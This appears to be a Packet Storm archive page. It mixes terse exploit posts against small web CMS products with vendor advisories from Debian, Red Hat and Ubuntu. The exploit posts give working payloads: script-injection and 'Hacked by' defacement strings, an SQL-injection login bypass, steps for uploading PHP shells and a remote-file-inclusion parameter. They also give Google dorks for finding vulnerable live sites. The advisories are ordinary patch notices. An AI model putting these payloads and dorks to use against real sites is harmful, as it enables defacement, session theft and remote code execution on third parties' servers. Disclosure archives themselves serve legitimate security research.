ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 670bf364f2d7ff34656860436ff284c800f86d1d679b95be7803858c4d41549d

Download | Favorite | View

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.editpubdz.com/                                                                                          |  | # Dork      : intext:"Powered By Editpub"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script>[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

ArabInfotech CMS 2.0.1 Cross Site Scripting

Alumni Club Management Tools version 2.2.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /events.html?daily_detail&date=27-3-2019'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/edu/events.html?daily_detail&date=27-3-2019%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 Cross Site Scripting

AngularJS Filemanager version 1.5.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : AngularJS Filemanager v1.5.1 File Upload Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://github.com/joni2back/angular-filemanager/archive/master.zip                                                |  | # Dork      : N/A                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] suffers from an arbitrary file upload vulnerability.[+] http://127.0.0.1/guruquest.net/file-manager/[+] upload your Ev!l php file====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

AngularJS Filemanager 1.5.1 Shell Upload

Alumni Club Management Tools version 2.2.7 suffers from file upload and remote SQL injection vulnerabilities.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 Unrestricted File Upload Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from remote sql injection as well From within the control panel, malicious files can be uploaded .[+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login .[+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files[+] find your files https://127.0.0.1/edu/admin_files.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a remote file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] RCE Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected File :      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] RCE : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Remote File Inclusion

Amazon S3 Droppy version 1.4.6 suffers from a remote shell upload vulnerability.

============================================================================================================================  
| # Title     : Amazon S3 Droppy v 1.4.6 File Upload Vulnerability                                                         |  
| # Author    : indoushka                                                                                                  |  
| # email     : indoushka4ever@gmail.com                                                                                   |  
| # Tested on : windows 10 Français V.(Pro)                                                                                |  
| # Vendor    : https://codecanyon.net/item/droppy-online-file-sharing/10575317                                            |    
| # Dork      : n/a                                                                                                        |  
============================================================================================================================

poc :

[+] Droppy is an online file sharing platform that can be used to share multiple files among friends, 

    family and colleagues. The files can be sent by email or an url that can be shared with everyone you would like to.

[+] Dorking İn Google Or Other Search Enggine 

[+] Select file Ev!l.php and send it to your e-mail or to direct link.

[+] it can be accessed remotely and run code execution.

[+] script save a copy of your file in the web server in dir " uploads/" with a secret code

[+] when you click in link to download your file right click and choose view source of download link not the page of your email:

[+] Exampel : view-source:http://droppy.proxibolt.com/PrHEtFg

[+] The script stores the attached files sent inside the hosting server of the website

    It does not give you the storage path, but when you open the source code of the sending page, 

       you will find the path of the attached file, and it can be accessed remotely and run

       Means line 100 It contains the secret code generated randomly by the script that 

       renames the file attached to it and stores it inside the folder

       And when you enter the storage path and combine the secret code with the file name, 

       the file opens for you inside the server,

[+] Line 99 , 100 , 101  
>  
>                     <input type="hidden" name="action" id="action" value="download">  
>                     <input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72">  
>                     <input type="hidden" name="download_id" id="download_id" value="PrHEtFg">  
>  
[+] add the secret code with name of your file that give you access .

[+] http://127.0.0.1/Droppy/uploads/c40c11023e25cb7cfcba1345c4e26f72-x.php

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Amazon S3 Droppy 1.4.6 Shell Upload

Debian Linux Security Advisory 5442-1 - It was discovered that in some conditions the Flask web framework may disclose a session cookie.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5442-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 29, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : flaskCVE ID         : CVE-2023-30861It was discovered that in some conditions the Flask web framework maydisclose a session cookie.For the oldstable distribution (bullseye), this problem has been fixedin version 1.1.2-2+deb11u1.We recommend that you upgrade your flask packages.For the detailed security status of flask please refer toits security tracker page at:https://security-tracker.debian.org/tracker/flaskFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSdym8ACgkQEMKTtsN8TjYRyhAAncBVfFUWx/LOdmid3NG+YIytJnj/ALdxMDnya+Z6DMZtoBzyw9M1wk5PAtlRuP1/BuwACQHUbSahR7eszOLLyLQOGWh6Qaff7784DpJBwZeTiLtSM+Zh+a5j3h19fYfYyCvcPhjKiLXg80jjQcYMWFttOWBZXNyQ8wpuyGRPT23yt2VaFhO7dy6j/zvPuXlLyMBtfDJOSvhZDZi95E7PtsWaQ6UmmEFUGzUW+dcTR/j9Qknfmxop14Iffv2Obvxf467Ms0wYcP0T26rgmc7FP9VqaHlsfra7HzDl7VU1egfiwJVxxQDNiRhxUoAS4LjF5TgXT8tdVKB5/Y5ibdLLydvWNkky0nsgCAimF3vruZB4ncKDCl4TxBaz+08ENLD/NS1A6LlcSriAWq0u/JSe13Xbpq+oxBll26Mu0PaOU9lwqQeNDj3a7GcqQW65OYDhZgP+GjcKkaSoG0mQ9b3Ni3tIQ14KeG8GUwlr8dKPL4qK658Vm5NXbQvMevVGnzrFg0tqCI/MVA6qSugkF8Mxr2XXnI0n4kWS/yKG7grjVBm3+oNJJcuPdzUkaJFY5S1d47tAmH6xQapnMDZCVJ47YdqnJYz1d97S+T+U2clYK2tka1edLfL3kDQ2wH01YsF2WSh/TRzNEFRVl2APdbkSeU3Y1y/nPt9mdb0oZdUmQDU==puZp-----END PGP SIGNATURE-----

Debian Security Advisory 5442-1

GZ Multi Hotel Booking System version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-multi-hotel-booking-system.html                   ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Multi Hotel Booking System 1.8                                          ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'adults' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2Path: /index.phpGET 'children' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2Path: /index.phpGET 'cal_id' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm[-] Done

GZ Multi Hotel Booking System 1.8 Cross Site Scripting

Red Hat Security Advisory 2023-3954-01 - This release of Red Hat Fuse 7.12 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, code execution, denial of service, information leakage, resource exhaustion, server-side request forgery, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Fuse 7.12 release and security update  
Advisory ID:       RHSA-2023:3954-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3954  
Issue date:        2023-06-29  
CVE Names:         CVE-2012-5783 CVE-2020-13956 CVE-2022-4492   
                   CVE-2022-24785 CVE-2022-31692 CVE-2022-36437   
                   CVE-2022-38398 CVE-2022-38648 CVE-2022-40146   
                   CVE-2022-41704 CVE-2022-41854 CVE-2022-41881   
                   CVE-2022-41940 CVE-2022-41946 CVE-2022-41966   
                   CVE-2022-42890 CVE-2022-42920 CVE-2022-45143   
                   CVE-2022-46363 CVE-2022-46364 CVE-2023-1108   
                   CVE-2023-1370 CVE-2023-20860 CVE-2023-20861   
                   CVE-2023-20883 CVE-2023-22602 CVE-2023-33201   
=====================================================================

1. Summary:

A minor version update (from 7.11 to 7.12) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.12 serves as a replacement for Red Hat Fuse  
7.11 and includes bug fixes and enhancements, which are documented in the  
Release Notes document linked in the References.

Security Fix(es):

* hazelcast: Hazelcast connection caching (CVE-2022-36437)

* spring-security: Authorization rules can be bypassed via forward or  
include dispatcher types in Spring Security (CVE-2022-31692)

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

* Apache CXF: SSRF Vulnerability (CVE-2022-46364)

* Undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* json-smart: Uncontrolled Resource Consumption vulnerability in json-smart  
(Resource Exhaustion) (CVE-2023-1370)

* springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
(CVE-2023-20860)

* spring-boot: Spring Boot Welcome Page DoS Vulnerability (CVE-2023-20883)

* jakarta-commons-httpclient: missing connection hostname check against  
X.509 certificate name (CVE-2012-5783)

* apache-httpclient: incorrect handling of malformed authority component in  
request URIs (CVE-2020-13956)

* undertow: Server identity in https connection is not checked by the  
undertow client (CVE-2022-4492)

* Moment.js: Path traversal in moment.locale (CVE-2022-24785)

* batik: Server-Side Request Forgery (CVE-2022-38398)

* batik: Server-Side Request Forgery (CVE-2022-38648)

* batik: Server-Side Request Forgery (SSRF) vulnerability (CVE-2022-40146)

* batik: Apache XML Graphics Batik vulnerable to code execution via SVG  
(CVE-2022-41704)

* dev-java/snakeyaml: DoS via stack overflow (CVE-2022-41854)

* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
(CVE-2022-41881)

* engine.io: Specially crafted HTTP request can trigger an uncaught  
exception (CVE-2022-41940)

* postgresql-jdbc: Information leak of prepared statement data due to  
insecure temporary file permissions (CVE-2022-41946)

* batik: Untrusted code execution in Apache XML Graphics Batik  
(CVE-2022-42890)

* Apache CXF: directory listing / code exfiltration (CVE-2022-46363)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

* shiro: Authentication bypass through a specially crafted HTTP request  
(CVE-2023-22602)

* bouncycastle: potential  blind LDAP injection attack using a self-signed  
certificate (CVE-2023-33201)

* tomcat: JsonErrorReportValve injection (CVE-2022-45143)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

873317 - CVE-2012-5783 jakarta-commons-httpclient: missing connection hostname check against X.509 certificate name  
1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing  
2144970 - CVE-2022-41940 engine.io: Specially crafted HTTP request can trigger an uncaught exception  
2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow  
2153260 - CVE-2022-4492 undertow: Server identity in https connection is not checked by the undertow client  
2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2155291 - CVE-2022-40146 batik: Server-Side Request Forgery (SSRF) vulnerability  
2155292 - CVE-2022-38398 batik: Server-Side Request Forgery  
2155295 - CVE-2022-38648 batik: Server-Side Request Forgery  
2155681 - CVE-2022-46363 Apache CXF: directory listing / code exfiltration  
2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2158695 - CVE-2022-45143 tomcat: JsonErrorReportValve injection  
2162053 - CVE-2022-36437 hazelcast: Hazelcast connection caching  
2162206 - CVE-2022-31692 spring-security: Authorization rules can be bypassed via forward or include dispatcher types in Spring Security  
2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close  
2180528 - CVE-2023-20860 springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
2180530 - CVE-2023-20861 springframework: Spring Expression DoS Vulnerability  
2182182 - CVE-2022-41704 batik: Apache XML Graphics Batik vulnerable to code execution via SVG  
2182183 - CVE-2022-42890 batik: Untrusted code execution in Apache XML Graphics Batik  
2182198 - CVE-2023-22602 shiro: Authentication bypass through a specially crafted HTTP request  
2188542 - CVE-2023-1370 json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)  
2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability  
2215465 - CVE-2023-33201 bouncycastle: potential  blind LDAP injection attack using a self-signed certificate

5. JIRA issues fixed (https://issues.redhat.com/):

ENTESB-20598 - Incomplete fix of CVE-2020-13956  
ENTESB-20598 - Incomplete fix of CVE-2020-13956  
ENTESB-21418 - CVE-2023-1370,  ensure that Syndesis is using fixed json-smart

6. References:

https://access.redhat.com/security/cve/CVE-2012-5783  
https://access.redhat.com/security/cve/CVE-2020-13956  
https://access.redhat.com/security/cve/CVE-2022-4492  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-31692  
https://access.redhat.com/security/cve/CVE-2022-36437  
https://access.redhat.com/security/cve/CVE-2022-38398  
https://access.redhat.com/security/cve/CVE-2022-38648  
https://access.redhat.com/security/cve/CVE-2022-40146  
https://access.redhat.com/security/cve/CVE-2022-41704  
https://access.redhat.com/security/cve/CVE-2022-41854  
https://access.redhat.com/security/cve/CVE-2022-41881  
https://access.redhat.com/security/cve/CVE-2022-41940  
https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2022-42890  
https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/cve/CVE-2022-45143  
https://access.redhat.com/security/cve/CVE-2022-46363  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/cve/CVE-2023-1370  
https://access.redhat.com/security/cve/CVE-2023-20860  
https://access.redhat.com/security/cve/CVE-2023-20861  
https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/cve/CVE-2023-22602  
https://access.redhat.com/security/cve/CVE-2023-33201  
https://access.redhat.com/security/updates/classification/#critical  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.fuse&version=7.12.0  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.12/

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ38aNzjgjWX9erEAQinAxAAok8XXaAwrRfOZy4j/osu5ZPTMpagKw0Q  
lf+XZ8a1F38yrVIxk7d48h04HBR865GIqAh5CrN0L9nrxGzkM6Dtiw43KzF3rXbd  
39ozCXv3y1JzRygzUM/RDv10s7kQAqAS9ZU1DWla0ALlcteOfKT98Ao8MAIhgrHg  
Ao+GtGN+jyVsIgfBkI7y6NoFmPG7OaPVg4F85Hq/uuOwg879CKkRIFWLFc8ziVtb  
QoouQ5Zdtb4wnhSqhzJq4pccKeSFXQG+uJV/OIlgMhbdGGkUOtcwX4CW8F584LiH  
ETBbkwnZfUF1FNo3sLRN942z4InkuLnqaX2TdT8wTaQCja1FW/O0Q7IfYTS9ESJ0  
xi06Rn3IeUoJCKIfeKrjI0f1dWqfHy11/TTNgANFbMRjlxJkNAN9nZLD5KdvzOp4  
1WfYTEsvuIaXchH/URDooI9BQ8m38kHogw/a9E/Qq4iXPRQtME7ANHfidCsuTq/9  
uYqOhuaqF82TMEmq2Y3P2D8RT5rnHFjjRbUvKbljzNBX2Co4CJ32zk3L1ol6GHZh  
rvnG1Tco9us8BbVHhSWaTSt3UOjf1eg1U9fhEijA8jR8tSf2Fw7c4e6dqU5kytVp  
ihK2fPpJ1HKqEm3gmPBEIYzSn7UxpjFMN1aZLRa5CZAD4p410Qg1zNX3BVLLI3zp  
vi0V6dxNE2g=  
=yKwR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3954-01

Ubuntu Security Notice 6194-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in the Linux kernel did not properly handle locking when IOPOLL mode is being used. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6194-1  
June 29, 2023

linux-oem-6.1 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-6.1: Linux kernel for OEM systems

Details:

Hangyu Hua discovered that the Flower classifier implementation in the  
Linux kernel contained an out-of-bounds write vulnerability. An attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-35788, LP: #2023577)

Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in the  
Linux kernel did not properly handle locking when IOPOLL mode is being  
used. A local attacker could use this to cause a denial of service (system  
crash). (CVE-2023-2430)

Wei Chen discovered that the InfiniBand RDMA communication manager  
implementation in the Linux kernel contained an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-2176)

It was discovered that for some Intel processors the INVLPG instruction  
implementation did not properly flush global TLB entries when PCIDs are  
enabled. An attacker could use this to expose sensitive information  
(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-6.1.0-1015-oem      6.1.0-1015.15  
   linux-image-oem-22.04c          6.1.0.1015.15

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6194-1  
   https://launchpad.net/bugs/2023220  
   https://launchpad.net/bugs/2023577  
   CVE-2023-2176, CVE-2023-2430, CVE-2023-35788

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1015.15

Source

Packet Storm